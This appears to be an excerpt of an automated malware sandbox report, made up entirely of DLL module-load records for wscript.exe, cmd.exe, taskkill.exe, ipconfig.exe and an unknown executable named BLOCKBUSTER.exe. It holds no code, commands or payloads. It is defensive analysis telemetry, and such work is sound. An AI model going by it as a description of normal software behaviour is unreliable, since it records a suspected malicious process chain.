Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: version.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_is2022.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_g18030.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_gsm7.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_iscii.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: unrar.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: 7zxa.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: security.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
